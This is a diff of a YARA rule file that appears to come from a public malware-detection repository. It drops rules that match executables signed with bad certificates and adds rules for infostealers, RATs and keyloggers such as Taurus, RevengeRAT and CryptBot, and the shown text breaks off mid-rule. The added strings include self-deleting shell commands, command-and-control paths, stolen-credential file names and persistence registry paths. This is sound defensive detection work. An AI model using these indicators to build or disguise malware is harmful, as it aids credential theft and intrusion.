+		$g6 = "get_AltKeyDown" fullword ascii
+		$m1 = "yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time" ascii
+		$m2 = "%image/jpg:Zone.Identifier\\tmpG.tmp%urlkey%-f \\Data\\Tor\\torrcp=%PostURL%127.0.0.1POST+%2B" ascii
+		$m3 = ">{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\\WScript.ShellRegReadg401" ascii
+		$m4 = "%startupfolder%\\%insfolder%\\%insname%/\\%insfolder%\\Software\\Microsoft\\Windows\\CurrentVersion\\Run%insregname%SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\RunTruehttp" ascii
+		$m5 = "\\WindowsLoad%ftphost%/%ftpuser%%ftppassword%STORLengthWriteCloseGetBytesOpera" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fubon Technologies Ltd" and pe.signatures [ i ] . serial == "07:ce:f6:6a:71:c3:5b:c3:ae:d6:d1:00:c6:49:38:63" )
+		( uint16( 0 ) == 0x5a4d and ( 8 of ( $s* ) or ( 6 of ( $* ) and all of ( $g* ) ) ) ) or ( 2 of ( $m* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00D3356318924C8C42959Bf1D1574E6482 : FILE
+rule DITEKSHEN_MALWARE_Win_Taurus : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Taurus infostealer payload"
 		author = "ditekSHen"
-		id = "7e23e9cf-5a34-55bb-a88d-4c0aef411372"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "c02114c1-9c97-5d0c-b7ce-1bd6a00a9e9a"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4888-L4899"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1483-L1519"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "86ca8da7e9e704f64be8ecd9e270108337d28b540ba8cd669a8d536ccfefea95"
+		logic_hash = "6039c27e69b47dfcc1327c34306627d2d9bd57f6bd365bb80b47ad21f892ae8a"
 		score = 75
-		quality = 75
+		quality = 48
 		tags = "FILE"
-		thumbprint = "e21f261f5cf7c2856bd9da5a5ed2c4e2b2ef4c9a"
-		importance = 20
+
+	strings:
+		$s1 = "t.me/taurus_se" ascii
+		$s2 = "rus_seller@explo" ascii
+		$s3 = "/c timeout /t 3  & del /f /q" ascii
+		$s4 = "MyAwesomePrefix" ascii
+		$txt1 = "LogInfo.txt" fullword ascii
+		$txt2 = "Information.txt" fullword ascii
+		$txt3 = "General\\passwords.txt" fullword ascii
+		$txt4 = "General\\forms.txt" fullword ascii
+		$txt5 = "General\\cards.txt" fullword ascii
+		$txt6 = "Installed Software.txt" fullword ascii
+		$txt7 = "Crypto Wallets\\WalletInfo.txt" fullword ascii
+		$txt8 = "cookies.txt" fullword ascii
+		$url1 = "/cfg/" wide
+		$url2 = "/loader/complete/" wide
+		$url3 = "/log/" wide
+		$url4 = "/dlls/" wide
+		$upat = /\.exe;;;\d;\d;\d\]\|\[http/
+		$x1 = "Vaultcli.dll" fullword ascii
+		$x2 = "Bcrypt.dll" fullword ascii
+		$x3 = "*.localstor" ascii
+		$x4 = "operator<=>" fullword ascii
+		$x5 = ".data$rs" fullword ascii
+		$x6 = "https_discordap" ascii
+		$o1 = { 53 56 8b 75 08 8d 85 64 ff ff ff 57 6a ff 6a 01 }
+		$o2 = { 6a 00 68 00 04 00 00 ff b5 a8 fe ff ff ff b5 ac }
+		$o3 = { ff 75 0c 8d 85 44 ff ff ff 50 e8 aa f7 ff ff 8b }
+		$o4 = { 8b 47 04 c6 40 19 01 8d 85 6c ff ff ff 8b 0f 50 }
+		$o5 = { 8d 8d ?? ff ff ff e8 5b }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ADV TOURS d.o.o." and pe.signatures [ i ] . serial == "00:d3:35:63:18:92:4c:8c:42:95:9b:f1:d1:57:4e:64:82" )
+		(( 3 of ( $s* ) or ( 6 of ( $txt* ) and 2 of ( $s* ) ) or ( $upat and 1 of ( $s* ) and 2 of ( $txt* ) ) or ( all of ( $url* ) and ( 2 of ( $txt* ) or 1 of ( $s* ) ) ) ) or ( uint16( 0 ) == 0x5a4d and all of ( $x* ) or ( all of ( $o* ) and 3 of ( $x* ) ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_038Fc745523B41B40D653B83Aa381B80 : FILE
+rule DITEKSHEN_MALWARE_Win_Remoteutilitiesrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "RemoteUtilitiesRAT RAT payload"
 		author = "ditekSHen"
-		id = "ed7581eb-52e7-5216-86a2-079bc5741b05"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "1cf3ece1-e723-5302-9673-273381ba7a8b"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4901-L4912"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1521-L1537"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b760525c38610b8a5cc990335122eab81cb895dc523908ef841c5c3117a1a372"
+		logic_hash = "179a559f6a6ffbce31595bd613d338bb6ac40b8a083ed0169cde754b6ed756c7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "05124a4a385b4b2d7a9b58d1c3ad7f2a84e7b0af"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.RemoteUtilitiesRAT"
+
+	strings:
+		$s1 = "rman_message" wide
+		$s2 = "rms_invitation" wide
+		$s3 = "rms_host_" wide
+		$s4 = "rman_av_capture_settings" wide
+		$s5 = "rman_registry_key" wide
+		$s6 = "rms_system_information" wide
+		$s7 = "_rms_log.txt" wide
+		$s8 = "rms_internet_id_settings" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Optima" and pe.signatures [ i ] . serial == "03:8f:c7:45:52:3b:41:b4:0d:65:3b:83:aa:38:1b:80" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ac0A7B9420B369Af3Ddb748385B981 : FILE
+rule DITEKSHEN_MALWARE_Win_Slothfulmedia : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "SlothfulMedia backdoor payload"
 		author = "ditekSHen"
-		id = "0935fd31-3d8f-57d2-a00e-ad7d5cdbe12d"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "e94b6d67-137c-5cfb-9c59-fbeb6cd85f0a"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4914-L4925"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1539-L1565"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "47dca0d0b84dd0d210cf7fdda3bcce796d090e5de3f4266bbed01eebdd397bfa"
+		logic_hash = "6f742e8d9d555b44daaa09835f599c99e16cd39bb106c8f43fbbca7093de462e"
 		score = 75
-		quality = 75
+		quality = 48
 		tags = "FILE"
-		thumbprint = "15b56f8b0b22dbc7c08c00d47ee06b04fa7df5fe"
-		importance = 20
+
+	strings:
+		$x1 = /ExtKeylogger(Start|Stop)/ fullword ascii
+		$x2 = /ExtService(Add|Delete|Start|Stop)/ fullword ascii
+		$x3 = /ExtRegKey(Add|Del)/ fullword ascii
+		$x4 = /ExtRegItem(Add|Del)/ fullword ascii
+		$x5 = "ExtUnload" fullword ascii
+		$s1 = "Local Security Process" fullword wide
+		$s2 = "Global%s%d" fullword wide
+		$s3 = "%s%s_%d.dat" fullword wide
+		$s4 = "\\AppIni" fullword wide
+		$s5 = "%s.tmp" fullword wide
+		$s6 = "\\SetupUi" fullword wide
+		$s7 = "%s|%s|%s|%s" fullword wide
+		$s8 = "\\ExtInfo" fullword wide
+		$cnc1 = "/v?m=" fullword ascii
+		$cnc2 = "%s&i=%d" fullword ascii
+		$cnc3 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75" fullword ascii
+		$cnc4 = "Content-Length: %d" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Tochka" and pe.signatures [ i ] . serial == "00:ac:0a:7b:94:20:b3:69:af:3d:db:74:83:85:b9:81" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or 7 of ( $s* ) or all of ( $cnc* ) or ( 1 of ( $x* ) and 4 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00913Ba16962Cd7Eee25965A6D0Eeffa10 : FILE
+rule DITEKSHEN_MALWARE_Win_Ircbot : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "IRCBot payload"
 		author = "ditekSHen"
-		id = "7a053089-44c8-5f30-8eee-dcd4ba24efe8"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "69739d82-9760-5c4e-bf9e-60c60617a12a"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4927-L4938"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1567-L1596"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a2e729c053d1a9d5895dc2247ea0804525f8f1744875d5c2f96b4255ad325dc5"
+		logic_hash = "1ea640202cfbd0c3425a192c45938f632dc644f41c7974118e7491b026122818"
 		score = 75
-		quality = 75
+		quality = 67
 		tags = "FILE"
-		thumbprint = "079aeb295c8e27ac8d9be79c8b0aaf66a0ef15de"
-		importance = 20
+
+	strings:
+		$s1 = ".okuninstall" fullword wide
+		$s2 = ".oksnapshot" fullword wide
+		$s3 = "\\uspread.vbs" fullword wide
+		$s4 = "KEYLogger" ascii nocase
+		$s5 = "GetKeyLogs" fullword ascii
+		$s6 = "GetLoocationInfo" fullword ascii
+		$s7 = "CaputerScreenshot" fullword ascii
+		$s8 = "get_SCRIPT_DATA" fullword ascii
+		$s9 = /irc_(server|nickname|password|channle)/ fullword ascii
+		$s10 = "machine_screenshot" fullword ascii
+		$s11 = "CollectPassword" fullword ascii
+		$s12 = "USBInfection" fullword ascii nocase
+		$cnc1 = "&command=UpdateAndGetTasks&machine_id=" wide
+		$cnc2 = "&machine_os=1&privateip=" wide
+		$cnc3 = "&command=InsertTaskExecution&excuter_id=" wide
+		$cnc4 = "&command=RegisterNewMachine" wide
+		$cnc5 = "&command=UpdateNewMachine" wide
+		$cnc6 = "&command=GetPayloads&keys=" wide
+		$cnc7 = "&command=SaveSnapshot" wide
+		$pdb = "\\Projects\\USBStarter\\USBStarter\\obj\\Release\\USBStarter.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JMT TRADING GROUP INC" and pe.signatures [ i ] . serial == "00:91:3b:a1:69:62:cd:7e:ee:25:96:5a:6d:0e:ef:fa:10" )
+		uint16( 0 ) == 0x5a4d and ( 7 of ( $s* ) or 3 of ( $cnc* ) or ( $pdb and 2 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_F44A91704F9Ea388446D2635F2A8C8A5 : FILE
+rule DITEKSHEN_MALWARE_Win_Apocalypse : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Apocalypse infostealer payload"
 		author = "ditekSHen"
-		id = "52f08ec1-fb83-59bc-bb90-2ae12245c0f7"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "f1fa6642-fe42-57e7-a1bc-0f59815049f8"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4940-L4953"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1598-L1615"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cec66648ecde5b11a2a20674b2e1f10c8b917ebeb26ddba0ead2b6af45c8519b"
+		logic_hash = "d18ac492ad57cf390f20693cb47ae2c6e3dbdd921fa846130a4bc20047e1aa27"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "573514c39bcef5690ab924f9df30577def6e877f"
-		hash1 = "d67dde5621d6de76562bc2812f04f986b441601b088aa936d821c0504eb4f7aa"
-		hash2 = "71f60a985d2cc9fc47c6845a88eea4da19303a96a2ff69daae70276f70dcdae0"
-		importance = 20
+
+	strings:
+		$s1 = "OpenClipboard" fullword ascii
+		$s2 = "SendARP" fullword ascii
+		$s3 = "GetWebRequest" fullword ascii
+		$s4 = "DotNetGuard" fullword ascii
+		$s5 = "set_CreateNoWindow" fullword ascii
+		$s6 = "UploadFile" fullword ascii
+		$s7 = "GetHINSTANCE" fullword ascii
+		$s8 = "Kill" fullword ascii
+		$s9 = "GetProcesses" fullword ascii
+		$s10 = "get_PrimaryScreen" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Binance" and pe.signatures [ i ] . serial == "f4:4a:91:70:4f:9e:a3:88:44:6d:26:35:f2:a8:c8:a5" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_029685Cda1C8233D2409A31206F78F9F : FILE
+rule DITEKSHEN_MALWARE_Win_Osno : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Osno ransomware and infostealer payload"
 		author = "ditekSHen"
-		id = "2c1d858b-3adc-5c05-bc72-2a6f12f7245e"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "25ed5ad4-804a-5608-b6fe-a811ca6744d8"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4955-L4966"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1617-L1652"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a7eec901d92d6126cbc4468d7f2fbccc905f550c7dc8d28b405f583cfde9aea3"
+		logic_hash = "3df59c306017001467a5f237db2ab37d97c34116558e18420a6a1f01f08f520f"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "86574b0ef7fbce15f208bf801866f34c664cf7ce"
-		importance = 20
+
+	strings:
+		$s1 = ".HolyGate+<>c+<<FinalBoss>" ascii
+		$s2 = /Osno(Keylogger|Stealer|Ransom)/ wide
+		$s3 = "password,executeWebhook('Account credentials" wide
+		$s4 = "-Name Osno -PropertyType" wide
+		$s5 = "process.env.hook" ascii
+		$s6 = "Stealer.JSON.JsonValue" ascii
+		$s7 = "<DetectBrowserss>b_" ascii
+		$s8 = "<TryGetDiscordPath>b_" ascii
+		$s9 = "antiVM" fullword ascii
+		$s10 = "downloadurl" fullword ascii
+		$s11 = "set_sPassword" fullword ascii
+		$txt0 = "{0} {1} .txt" fullword wide
+		$txt1 = "\\ScanningNetworks.txt" fullword wide
+		$txt2 = "\\SteamApps.txt" fullword wide
+		$txt3 = "-ErrorsLogs.txt" fullword wide
+		$txt4 = "-keylogs.txt" fullword wide
+		$txt5 = "Hardware & Soft.txt" fullword wide
+		$cnc0 = "/csharp/" ascii wide
+		$cnc1 = "token=" ascii wide
+		$cnc2 = "&timestamp=" ascii wide
+		$cnc3 = "&session_id=" ascii wide
+		$cnc4 = "&aid=" ascii wide
+		$cnc5 = "&secret=" ascii wide
+		$cnc6 = "&api_key" ascii wide
+		$cnc7 = "&session_key=" ascii wide
+		$cnc8 = "&type=" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KOTO TRADE" and pe.signatures [ i ] . serial == "02:96:85:cd:a1:c8:23:3d:24:09:a3:12:06:f7:8f:9f" )
+		( uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or 4 of ( $txt* ) or ( 4 of ( $s* ) and 2 of ( $txt* ) ) ) ) or ( 7 of ( $cnc* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Aebe117A13B8Bca21685Df48C74F584D : FILE
+rule DITEKSHEN_MALWARE_Win_Betabot : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "BetaBot payload"
 		author = "ditekSHen"
-		id = "2b9c40e8-9c0e-523d-b746-4e31d0a780e0"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "377c500c-5727-5bea-ac46-cb69c868a607"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4968-L4979"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1654-L1666"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cb17c6f311d88125ad0c790c61fe0dd1ffbdefdbea45ffb54c47da5d98f99900"
+		logic_hash = "e594d01874ee622169d6708ddc6cfde7f1d26d2bea1604961dc860700e8a1d5d"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "4dc9713dfb079fbae4173d342ebeb4efb9b0a4dc"
-		importance = 20
+
+	strings:
+		$s1 = "__restart" fullword ascii
+		$s2 = "%SystemRoot%\\SysWOW64\\tapi3.dll" fullword wide
+		$s3 = "%SystemRoot%\\system32\\tapi3.dll" fullword wide
+		$s4 = "publicKeyToken=\"6595b64144ccf1df\"" ascii
+		$s5 = "VirtualProtectEx" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NANAX d.o.o." and pe.signatures [ i ] . serial == "00:ae:be:11:7a:13:b8:bc:a2:16:85:df:48:c7:4f:58:4d" )
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_38989Ec61Ecdb7391Ff5647F7D58Ad18 : FILE
+rule DITEKSHEN_MALWARE_Win_Wshratplugin : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "WSHRAT keylogger plugin payload"
 		author = "ditekSHen"
-		id = "40c742ec-f683-57fe-bb35-7c44617f9199"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "45c4fc87-6c45-5cd7-9fc4-7d3ea664a740"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4981-L4992"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1668-L1685"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f2108c41c814a815047268d9934a01231936a1cf73cbb92476eb96c9fe4b1091"
+		logic_hash = "3feeab43b58b533b7d2d41a71f2107e6f05b9c54ff805607843d253cadbe9384"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "71e74a735c72d220aa45e9f1b83f0b867f2da166"
-		importance = 20
+		snort_sid = "920010-920012"
+		clamav_sig = "MALWARE.Win.Trojan.WSHRAT-KLG"
+
+	strings:
+		$s1 = "GET /open-keylogger HTTP/1.1" fullword wide
+		$s2 = "KeyboardChange: nCode={0}, wParam={1}, vkCode={2}, scanCode={3}, flags={4}, dwExtraInfo={6}" wide
+		$s3 = "MouseChange: nCode={0}, wParam={1}, x={2}, y={3}, mouseData={4}, flags={5}, dwExtraInfo={7}" wide
+		$s4 = "sendKeyLog" fullword ascii
+		$s5 = "saveKeyLog" fullword ascii
+		$s6 = "get_TotalKeyboardClick" fullword ascii
+		$s7 = "get_SessionMouseClick" fullword ascii
+		$pdb = "\\Android\\documents\\visual studio 2010\\Projects\\Keylogger\\Keylogger\\obj\\x86\\Debug\\Keylogger.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RotA Games ApS" and pe.signatures [ i ] . serial == "38:98:9e:c6:1e:cd:b7:39:1f:f5:64:7f:7d:58:ad:18" )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00D08D83Ff118Df3777E371C5C482Cce7B : FILE
+rule DITEKSHEN_MALWARE_Win_Revengerat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "RevengeRAT and variants payload"
 		author = "ditekSHen"
-		id = "d4857ec5-2c99-51f8-a5b8-938c8d83169e"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "7d725050-108c-54b5-978e-2dd2124f5b0f"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4994-L5005"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1687-L1713"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b6c7f5c57c79d11132535bedce77276f67c4f854f5e8ef2c12aced64f8a188d0"
+		logic_hash = "be9e50052f45b94d5995db723dd64d16a91c5ba0d3f589c018155c0cce45124f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8a1bcf92ea961b8bc8817b0630f34607ccb5bff2"
-		importance = 20
+		snort_sid = "920000-920002"
+
+	strings:
+		$l1 = "Lime.Connection" fullword ascii
+		$l2 = "Lime.Packets" fullword ascii
+		$l3 = "Lime.Settings" fullword ascii
+		$l4 = "Lime.NativeMethods" fullword ascii
+		$s1 = "GetAV" fullword ascii
+		$s2 = "keepAlivePing!" fullword ascii wide
+		$s3 = "Revenge-RAT" fullword ascii wide
+		$s4 = "*-]NK[-*" fullword ascii wide
+		$s5 = "RV_MUTEX" fullword ascii wide
+		$s6 = "set_SendBufferSize" fullword ascii
+		$s7 = "03C7F4E8FB359AEC0EEF0814B66A704FC43FB3A8" fullword ascii
+		$s8 = "5B1EE7CAD3DFF220A95D1D6B91435D9E1520AC41" fullword ascii
+		$s9 = "\\RevengeRAT\\" ascii
+		$q1 = "Select * from AntiVirusProduct" fullword ascii wide
+		$q2 = "SELECT * FROM FirewallProduct" fullword ascii wide
+		$q3 = "select * from Win32_Processor" fullword ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMO-K Limited Liability Company" and pe.signatures [ i ] . serial == "00:d0:8d:83:ff:11:8d:f3:77:7e:37:1c:5c:48:2c:ce:7b" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $l* ) and 3 of ( $s* ) ) or ( all of ( $q* ) and 3 of ( $s* ) ) or 3 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_249E3F1B7595E7D0Fe6Df13303287343 : FILE
+rule DITEKSHEN_MALWARE_Win_TRAT : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "TRAT payload"
 		author = "ditekSHen"
-		id = "3f780428-a482-5201-a7ca-d3608779a5e4"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "15f80970-6bc7-5e29-86d6-f7529a10d227"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5007-L5018"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1715-L1730"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4df122a53f2c1a08d1694c8e64b802f58507bb985f1aed8c91e6d7ad24906fca"
+		logic_hash = "b8474c74cd9f21fcb3a8ae1c7a7a0a801f0f117782e9803cdae39daf7f0f8b2f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8e99b2786f59e543d1f3d02d140e35342c55c18a"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.TRAT"
+
+	strings:
+		$s1 = "^STEAM_0:[0-1]:([0-9]{1,10})$" fullword wide
+		$s2 = "^7656119([0-9]{10})$" fullword wide
+		$s3 = "Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)" ascii
+		$s4 = "\"schtasks\", \"/delete /tn UpdateWindows /f\");" ascii
+		$s5 = "ProcessWindowStyle.Hidden" ascii
+		$s6 = "+<>c+<<ListCommands>" ascii
+		$s7 = "//B //Nologo *Y" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "gsLPuSUgRZueWihiZHqYBriNSQqS" and pe.signatures [ i ] . serial == "24:9e:3f:1b:75:95:e7:d0:fe:6d:f1:33:03:28:73:43" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_31D852F5Fca1A5966B5Ed08A14825C54 : FILE
+rule DITEKSHEN_MALWARE_Win_Cryptbot : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "CryptBot/Fugrafa stealer payload"
 		author = "ditekSHen"
-		id = "8d65caa2-ce28-5f9b-b8a5-3fe903dd5628"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "248961dd-b98d-509b-92a0-1670b7687e25"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5020-L5031"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1732-L1766"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e2890f8c623ce15d8a3f996e87be4b73a8cd9f96386ce8d356d7e0fad0342dd3"
+		logic_hash = "6322b8b1ad210fac4475c194e060046538d4174f69a7c0e3618646d262cd33bd"
 		score = 75
-		quality = 75
+		quality = 69
 		tags = "FILE"
-		thumbprint = "a657b8f2efea32e6a1d46894764b7a4f82ad0b56"
-		importance = 20
+		snort2_sid = "920110"
+		snort3_sid = "920108"
+		clamav_sig = "MALWARE.Win.Trojan.CryptBot"
+
+	strings:
+		$s1 = "Username: %wS" fullword wide
+		$s2 = "Computername: %wS" fullword wide
+		$s3 = "/c rd /s /q %" wide
+		$s4 = "IP: N0t_IP" fullword wide
+		$s5 = "Country: N0t_Country" fullword wide
+		$s6 = "password-check" fullword ascii
+		$s7 = "Content-Disposition: form-data; name=\"file\"; filename=\"" ascii wide
+		$s8 = "[ %wS ]" wide
+		$s9 = "EXE_PATH:" wide
